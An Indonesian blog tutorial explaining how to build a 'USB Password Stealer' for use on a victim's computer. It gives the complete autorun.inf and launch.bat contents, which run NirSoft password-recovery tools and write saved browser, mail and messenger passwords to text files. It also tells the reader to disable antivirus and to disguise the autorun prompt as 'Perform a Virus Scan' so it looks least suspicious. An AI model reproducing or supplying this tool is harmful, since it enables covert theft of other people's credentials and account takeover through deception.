Cara Membuat USB Password Stealer

USB Password Stealer


USB Password Stealer


Banyak sekali manusia yang ada di muka bumi ini dan bahkan lebih banyak akun onlinennya. Setiap sistem keamanan memiliki kelemahan dan yang akan kita bahas disini hanyalah hal tersebut. 


Orang yang suka dengan mengceklis (√) tombol/kolom "Remember Me" atau "Ingat Saya" di berbagai situs tanpa berpikir dua kali apakah itu akan aman bagi mereka. Hal ini (menceklis kolom "Ingat Saya" atau "Remember Me") biasanya dilakukan oleh orang yang memiliki sistem/komputer pribadi, seperti laptop yang tidak pernah disentuh oleh orang pain sama sekali atau PC yang dikunci dengan password. Tanpa mengetahui hal itu, disana (internet) banyak sekali alat/software untuk "merecover/mengembalikan" password yang tersimpan (lebih dari sekedar untuk mengeksploit orang-orang naif ini). 


Browser menyimpan password dan detail akun di yang namanya "cookies". Mereka hanya menawarkan sedikit keamanan, bahkan lebih buruk, tidak ada browser yang peduli tentang mengenripsi password. Kebanyakan dari mereka (browser) memiliki pilihan seperti "Show Saved Passwords" atau "Tampilkan Password yang tersimpan" di dalam menu pilihan. Dan kita hanya cukup mencolokan USB, keluarkan dan yaa...!!! Kita dapat semua passwordnya. Itulah yang akan sobat pelajari di tutorial ini. Jadi, dengan tujuan dalam pikiran dan tidak membuang waktu sedikit pun, mari kita mulai sekarang juga. 



Hal hal yang dibutuhkan


Hal-hal yang sobat perlukan (lihat link di bawah ini): 



  • MessenPass- MessenPass adalah alat pemulihan kata sandi yang dapat menampilkan password di beberapa aplikasi instant messenger yang umum. 


  • Mail PassView - Mail PassView adalah alat pemulihan password mini yang dapat menampilkan password dan rincian akun lainnya untuk Outlook Express, Window Mail, POP3, dll. 


  • IE Passview - IE Passview adalah program mini lain yang membantu kita melihat password yang tersimpan di Internet Explorer (mungkin yang ini nggak terlalu dibutuhin, karena nggak banyak yang pake Internet Explorer. Tapi, download aja buat jaga-jaga). 


  • Protected Stored Pass View (PSPV) - PSPV adalah tools/alat mini yang dapat menampilkan password yang tersimpan di browser komputer Anda seperti Internet Explorer, Outlook Express dan MSN Explorer. 


  • Password Fox - Password Fox adalah sebuah program kecil yang digunakan untuk melihat password yang tersimpan di Mozilla Firefox. (Yang kaya ini sudah ada banyak dan Anda bisa ngegoogle buat cari yang lebih baik. Bahkan, ada alat yang serupa buat browser Chrome juga.Anda bisa nemuin ini dan masih banyak lagi dihttp://www.nirsoft.net/ ). 


Jadi begitulah dan sekarang kita siap untuk membuat USB Password Stealer (USB "pencuri" password). !!! Program ini akan menarik banyak perhatian dari software antivirus (Biasakan ini). Mohon nonaktifkan antivirus sobat sejenak (sampai proses pembuatan selesai) sebelum melakukan langkah ini, dengan risiko sobat sendiri tentunya. 



Cara membuat USB password stealer


1. Download semua 5 alat/software ini di USB Anda. Kebanyakan dari mereka berupa file .exe (mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe) (sobat memerlukan kelima software sepenuhnya pada USB sobat. Pastikan sobat memiliki semua file penginstalan di komputer sobat dan pindahkan ke USB). 


2. Buat Notepad baru dan tulis teks berikut ini ke dalamnya (langsung sobat copas aja) : 


[Autorun] open= ​launch.bat 

ACTION= Perform a Virus Scan

Simpan di notepad  dan ganti nama dari Document.txt ke autorun.inf. Sekarang, salin file autorun.inf ke flashdisk USB sobat. 


3. Buat Notepad lain dan tuliskan teks berikut ke dalamnya. (Langsung copas aja) 


start mspass.exe /mspass.txt stext 

start mailpv.exe /stext mailpv.txt 
start iepv.exe /stext iepv.txt 
start pspv.exe /stext pspv.txt 
start passwordfox.exe /stext passwordfox.txt 

!!! start .exe mungkin saja namanya berbeda jadi, isi dengan nama file yang sudah di download tadi, karena mungkin nama filenya akan sedikit berbeda dari tutorial ini. 


Simpan Notepad tadi dan ganti nama dari Document.txt ke launch.bat 

Salin file launch.bat ke USB Drive sobat. 

Ini adalah perintah sederhana untuk memulai program "pemulihan" password segera setelah sobat mencolokan USB sobat. Yang baru saja kita lakukan tadi hanya menghubungkan file batch launch.bat kita ke file autorun.inf yang otomatis berjalan saat komputer mendeteksi USB. Di launch.bat, kita memulai program kita dan memberi mereka nama file sebagai parameter sehingga masing-masing program memasukkan password dalam file txt masing-masing. Sekarang USB Password Stealer sobat sudah siap. 


Yang harus sobat lakukan adalah memasukkan USB Password Stealer ke komputer korban sobat dan sebuah noifikasi akan muncul, di jendela notifikasi opsi pilihan (Perform a Virus Scan) segera setelah sobat atau siapapun mengkliknya, Password Stealer USB sobat akan melakukan 'magic' dan semua password yang tersimpan di sistem atau browser, akan disimpan dalam file .txt. 


Saya sarankan sobat untuk mencobanya di komputer sobat terlebih dahulu untuk melihat bagaimana USBnya bekerja .


 Lihat teks terakhir di baris terakhir file autorun.inf (Perform a Virus Scan), kita bisa menentukan teks untuk dialog lansiran. Sobat bisa mengetikkan apa pun yang menurut sobat paling tidak mencurigakan. 


Ini mungkin tidak bekerja pada semua sistem operasi dan semua browser yang berbeda. 


Taruhan terbaik sobat adalah mengemas beragam program sebanyak mungkin karena memberi sobat kesempatan terbaik. Juga, perhatikan bahwa komputer seharusnya tidak memiliki fitur autorun yang dinonaktifkan USB Password Stealerbisa bekerja. 


Eitsss, jangan lupa untuk mengaktifkan kembali antivirus sobat jika prosesnya sudah selesai, dan jangan lupa untuk like postingan saya kali ini, kalau bisa sih like semua postingan blog saya :v.

Sekian dari saya. Salam Hax

Kunjungi juga website saya>>

http://cuplistech.blogspot.com/

Share this

Related Posts

Latest
Previous
Next Post »

1 komentar:

komentar
8 Juni 2021 pukul 11.17 delete

Terimakasih informasinya, nanti saya coba gan

Reply
avatar

Komentar dengan pantas ya sobat. Yang mau naro link silahakan aja, saya nggak melarang (asal jangan kebanyakan :v).